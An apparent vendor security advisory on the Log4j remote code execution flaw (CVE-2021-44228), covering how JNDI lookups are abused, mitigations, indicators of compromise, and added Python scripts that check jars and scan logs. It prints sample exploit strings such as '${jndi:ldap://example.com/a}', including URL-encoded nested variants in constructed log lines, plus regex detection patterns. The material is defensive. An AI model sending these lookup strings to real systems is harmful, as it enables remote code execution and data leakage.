
Critical vulnerability Log4j

IMPORTANT: this blog post is outdated; please see the following link for the latest mitigation.

Click here.

Summary

The Apache Log4j 2 library in versions below 2.15.0 is vulnerable to Remote Code Execution (RCE) (CVSS score: 10, CVE-2021-44228). If a specially crafted line of text, sent by an attacker, is logged by Log4j, the payload inside it is executed. Multiple mitigation options exist: changing configuration parameters or removing classes from non-updated Log4j instances, or updating Log4j to version 2.15 or higher (which requires a restart of the application or system).

Background

The vulnerability exists due to the way Log4j handles Java Naming and Directory Interface (JNDI) lookups. In the context of the vulnerability these lookups are made with "user provided input", and malicious users abuse this pattern to trigger lookups that retrieve and load malware.

In some applications user input or user interaction is logged. An attacker can abuse this logging to make the application query remote servers over protocols such as (Secure) Lightweight Directory Access Protocol (LDAP(S)), Remote Method Invocation (RMI) and the Domain Name System (DNS).

An example of such a query is:

${jndi:ldap://example.com/a}

These lookups can be nested inside each other, and nested lookups can be used to leak system information to the attacker.

All systems and services using the Log4j library (versions 2.0-beta9 up to and including 2.14.1) are vulnerable. Even systems and applications that are not directly connected to the internet (e.g. behind firewalls, proxies or load balancers) can be at risk, because the malicious string only has to reach a component that logs it.

Examples of applications and systems that use Log4j include VMware, Elasticsearch, Atlassian products, Apache and Oracle products.

Mitigation

We strongly advise upgrading Log4j to version 2.15.0 or higher as soon as possible. Releases of Log4j can be found here.

If updating Log4j to version 2.15.0 or higher isn't possible, specific settings should be changed to prevent the lookups that are abused by the vulnerability. To apply these settings a restart is required.

From version 2.10 onwards, lookups in log messages can be disabled by setting the system property log4j2.formatMsgNoLookups to true (for example with -Dlog4j2.formatMsgNoLookups=true on the Java command line) or by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true:

# System property: change this property to 'true'
log4j2.formatMsgNoLookups=true

# Or, as an environment variable
LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Alternatively, for versions up to 2.10 (where the property above is not available), the JndiLookup class can be removed from the jar:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

As a last resort, firewall rulesets can be used to inspect and drop incoming traffic containing jndi lookup strings and to block all outgoing LDAP and RMI traffic, as a temporary workaround.
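As an added example (not from the original post), a small Python script that checks a log4j-core jar against the two conditions above: it reads the version from the Maven pom.properties entry that log4j-core jars carry, reports whether JndiLookup.class is still present, and can strip that class the same way the zip -d command does. The stand-in jar it builds for its demo is constructed and contains only the two entries inspected; the verdict strings and the FIXED threshold are this script's own assumptions.

```python
import io, os, re, tempfile, zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 15, 0)  # first release with the fix (assumption of this script, per the post)

def parse_version(text):
    """'2.14.1' or '2.0-beta9' -> comparable (major, minor, patch) tuple."""
    nums = [int(re.match(r"\d*", c).group() or 0) for c in text.split(".")]
    return tuple((nums + [0, 0, 0])[:3])

def assess_jar(path):
    """Read the log4j-core version from pom.properties and check for JndiLookup.class."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPS in names:
            for line in jar.read(POM_PROPS).decode().splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_class = JNDI_CLASS in names
    if version is not None and parse_version(version) >= FIXED:
        verdict = "patched"
    elif not has_class:
        verdict = "mitigated (JndiLookup removed)"
    else:
        verdict = "vulnerable: upgrade to 2.15.0 or higher"
    return {"version": version, "jndi_lookup_present": has_class, "verdict": verdict}

def remove_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (same effect as the zip -d command above)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(path) as jar, zipfile.ZipFile(buf, "w") as out:
        for info in jar.infolist():
            if info.filename != JNDI_CLASS:
                out.writestr(info.filename, jar.read(info.filename), info.compress_type)
    with open(path, "wb") as f:
        f.write(buf.getvalue())

def run_demo(version="2.14.1"):
    """Build a constructed stand-in jar (only the two entries inspected), assess, strip, reassess."""
    with tempfile.TemporaryDirectory() as tmp:
        jar = os.path.join(tmp, f"log4j-core-{version}.jar")
        with zipfile.ZipFile(jar, "w") as z:
            z.writestr(POM_PROPS, f"version={version}\n")
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
        before = assess_jar(jar)
        remove_jndi_lookup(jar)
        return before, assess_jar(jar)
```

On a real system, point assess_jar at each log4j-core-*.jar found on the application's classpath; jars without the pom.properties entry report version None and are judged on the class alone.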

Indicators of Compromise

  1. Review Apache (web server) logs for jndi:ldap, jndi:rmi or jndi:dns entries. Such entries are potential attempts to exploit the Log4j vulnerability.
  2. Scan /var/log (or, for Apache on Windows, the applicable log folder such as [DriveLetter]:\logs\) with signatures matching these indicators.
  3. Scan web servers for generic webshells and review outbound connections originating from web servers in your firewall logs.
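As an added example (not part of the original post), a Python scanner implementing the first two checks above over constructed Apache access-log lines: it URL-decodes each line and resolves nested lower/upper lookups before matching, so the nested form mentioned in the Background section is still flagged. The sample lines, regular expressions and function names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). Only the first three
# carry a lookup string (in the query string, the User-Agent, and URL-encoded); the last is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET /login?user=${jndi:ldap://example.com/a} HTTP/1.1" 200 512
203.0.113.5 - - [11/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:rmi://example.com/b}"
203.0.113.6 - - [11/Dec/2021:10:02:10 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Adns%3A%2F%2Fexample.com%2Fc%7D HTTP/1.1" 404 0
198.51.100.9 - - [11/Dec/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# A nested ${lower:x}/${upper:x} lookup resolves to its argument; case is irrelevant for matching.
NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)


def normalise(line):
    """URL-decode (twice, to cover double encoding) and resolve nested lower/upper lookups."""
    text = unquote(unquote(line))
    prev = None
    while prev != text:  # repeat until no nested lower/upper lookup is left
        prev, text = text, NESTED.sub(lambda m: m.group(1), text)
    return text


def find_jndi_indicators(lines):
    """Return (line_number, scheme, normalised line) for every line holding a jndi lookup."""
    hits = []
    for number, raw in enumerate(lines, 1):
        norm = normalise(raw)
        m = JNDI.search(norm)
        if m:
            hits.append((number, m.group(1).lower(), norm))
    return hits


def scan_file(path):
    """Apply the check to a log file on disk, e.g. one found under /var/log."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return find_jndi_indicators(f)


if __name__ == "__main__":
    for number, scheme, norm in find_jndi_indicators(SAMPLE_LOG.splitlines()):
        print(f"line {number}: jndi:{scheme} lookup -> {norm[:80]}")
```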

Support by Ordina

Ordina is proactively supporting clients in their efforts to mitigate the Log4j vulnerability and ensure their resilience.

  1. Identify: Ethical Hackers from our Red Team identify the use of Log4j within application stacks and research whether the version in use is vulnerable, thereby exposing the attack surface within your organization.
  2. Protect: Members of our Blue Team then proactively take the measures mentioned above to prevent the misuse of Log4j and minimize the impact of the vulnerability.
  3. Detect: Once the preventive measures are in place, our Blue Team shifts to detection mechanisms in order to detect ongoing attacks.
  4. Respond: Based on Indicators of Compromise and our detection mechanisms, our Blue Team will assist in the case of a successful compromise to ensure quick and effective containment of the attack.
  5. Recover: Our Security Strategy team evaluates the response process and incorporates the 'lessons learned' into your 0-day reaction processes to ensure your resilience against future 0-days.

If you require any assistance with identifying whether the vulnerability is present in your IT environment, remediation of the vulnerability or rapid response to an ongoing cyberattack, please give us a call: 030 – 663 80 03 or send an e-mail to blueteam@ordina.nl.

